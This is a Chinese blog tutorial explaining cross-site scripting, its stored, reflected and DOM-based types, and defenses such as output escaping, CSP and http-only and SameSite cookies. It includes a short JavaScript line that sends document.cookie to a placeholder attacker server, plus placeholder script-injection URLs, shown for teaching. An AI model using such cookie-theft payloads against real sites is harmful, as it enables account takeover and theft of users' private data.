xss攻击是什么?

XSS 是什么?

XSS,即跨站脚本攻击,是 Cross-site scripting 的简称。

完整名称缩写后本该是 CSS,但这恰好与 层叠样式表 Cascading Style Sheets 的缩写撞车了,为了加以区分,便采用了 XSS 这个叫法。

XSS,归根结底属于代码注入。借助某种途径在目标网站中插入一段恶意脚本,当访客浏览该站点时便会触发这段代码。

攻击手段大致包含以下几类:

  • 窃取用户的登录凭据,得手后登入账户窃取隐私数据

const img = new Image();
img.src = 攻击者的服务器_ip + document.cookie;

  • 直接执行某些需要授权才能完成的操作,例如替站内某人投票。
  • 针对小型站点发起 Dos 攻击。所谓 Dos 就是在极短时间内发送海量请求,使网站来不及响应,造成服务不可用。假设你在百度首页成功植入了恶意脚本,该脚本持续向某个小站发起请求。与此同时大量用户打开百度首页,请求量就变得极其惊人,小站直接瘫痪。

XSS 分类

XSS 主要包含:存储型 XSS、反射型 XSS、以及 DOM 型 XSS。

存储型 XSS

恶意脚本被永久性地存放在数据库里。

例如在个人简介的文本字段中,写入了 <script>// 此处为一段恶意代码</script>。当访客打开攻击者的个人主页时,若服务端渲染直接采用了这段数据,且未做任何转义处理,生成的 HTML 里便夹带了这段脚本,随即执行。

反射型 XSS

部分网页会把 URL 中的某些参数当作页面内容来渲染。

比如我们期望用户完成支付后跳转至结果页,该页面通过 URL 中的查询字符串来展示信息,例如 http://a.com/order?message=成功,我们会取出 message 的值”成功”,把这段文字渲染到页面上。

倘若这个”成功”被攻击者替换成恶意脚本,变为 http://a.com/order?message=<script>// 恶意脚本内容</script>,且站点未做转义处理,那么这段恶意脚本就会被嵌入并执行。

当然这类链接看起来很异常,用户正常情况下不会接触到。

于是攻击者需要提前构造好,再通过某些手段引导用户去访问,比如借助钓鱼邮件诱导点击。

DOM 型 XSS

DOM 型 XSS 与反射型较为相似,但它跟后端没有关系,属于前端的漏洞。

前两种类型采用的是服务端渲染,即用户请求 HTML 时,由服务端组装好完整的 HTML 返回。

DOM 型 XSS 则是服务端并未返回完整的 HTML,而是交由前端来拼接渲染,若未做特殊处理,同样会引发恶意代码注入。

XSS 防御

  • 不要轻信用户提交的数据;
  • 运用转义,通常是对 '&<> 进行转义。例如 React 已对字符做了防 XSS 处理,源码位置:https://github.com/facebook/react/blob/HEAD/packages/react-dom/src/server/escapeTextForBrowser.js#L51
  • 若采用后端渲染,也务必做好转义或过滤处理;
  • 部署 CSP(内容安全策略)。Twitter 站点就应用了该策略;
  • 对敏感 cookie 加上 http-only 标记,使前端脚本无法读取;
  • cookie 的 SameSite 属性建议调整为 Strict 或 Lax,让跨域 HTTP 请求的头部无法自动附带 cookie;
  • 发起敏感操作时,增加验证码验证;
  • 限制内容输入长度(效果有限);

结尾

XSS 攻击属于一种相当普遍的代码注入类攻击。

日常开发中,需留意哪些数据在渲染时可能存在 XSS 注入隐患,做好必要的防护措施,希望本文对你有所启发。

原创文章,作者:余初云,如若转载,请注明出处:https://blog.jidcy.com/jsjc/2882.html

Like (1)
Previous 2026年6月8日
Next 2026年6月8日

相关推荐

  • 服务器接入高防IP后有哪些作用?

    什么是高防IP?高防IP是由高防数据中心所提供的IP地址段,主要面向网络服务器在遭遇大规模DDoS攻击时所提供的防护服务。高防IP是当前最为普遍的一种抵御DDoS攻击的方式,用户可…

    2026年6月4日
    0
  • 深入掌握Nginx服务器

    本文介绍nginx服务器及其主要特性,首先给出了包管理器安装及编译安装两种方式,然后重点对 nginx 配置文件中的指令及参数进行详细说明,在了解 nginx 的工作方式后,从 n…

    2026年5月8日
    0
  • Linux常用到的归档与压缩命令盘点

    在日常运维工作中,不可避免会打包压缩和解压文件,Linux上有多个类似功能的命令,如 tar、gzip、bzip2、xz、zip,今天就跟大家一起区分一下并学会如何高效实用它们。 …

    2026年5月7日
    0
  • Python如何使用Selenium抓取动态网站

    对于用静态 HTML 和 CSS 构建的网站,像 Python 的请求库和 Beautiful Soup 这样的简单工具通常能在网页抓取时完成工作。然而,在处理基于动态 JavaS…

    2026年3月30日
    0
  • HTTPS靠什么保障通信安全?

    大多数人都听说过HTTPS,也清楚它的作用是保障通信安全,但如果没仔细研究过,大概率说不清它到底是怎么做到的。 这篇文章围绕三个核心问题展开: 1、HTTPS到底是什么? 2、它跟…

    2026年6月11日
    0
  • WAF防火墙的作用

    随着WEB应用的广泛普及,WEB服务器凭借其强大的运算能力、处理性能以及所承载的较高价值,逐步成为主要的攻击目标。SQL注入、页面篡改、网页挂马等安全事件屡见不鲜。传统防火墙难以对…

    2026年6月5日
    0
  • 如何在Ubuntu和Debian上设置时区和NTP

    对于服务器管理员来说,正确配置和维护服务器上的时间是很重要的。错误的时间配置将导致服务器环境混乱,例如数据不一致、数据同步失败和作业调度等问题。 为了避免这些情況,首先需要在服务器…

    2026年5月11日
    0
  • oss对象存储服务是什么?

    高效地处理大规模数据已经成为许多企业的核心需求​​​​​​​,企业正日益借助大规模的对象存储来打造企业级数据池与智能存储服务,存储系统正朝着更具弹性、更高效、更智能的方向迈进,以契…

    2026年6月9日
    0
  • 如何做一个永远不暴露真实IP的网站

    抵御DDoS攻击最核心的方法是花钱上高防,同时遮盖网站真实IP。本文具体介绍几种网站遮盖真实ip的方式和利弊,让你能真正做一个永远不暴露真实IP的网站。 做一个永远不暴露真实IP的…

    2026年5月30日
    0
  • Linux 中的删除目录:rm 和 rmdir 解析

    在 Linux 中,需要删除目录文件时靠两个命令就能完成:rm 和 rmdir。乍一看它们相似,但行为却截然不同,如使用错误的命令,可能会删除远超预期的内容。 Linux rm 和…

    2026年3月30日
    0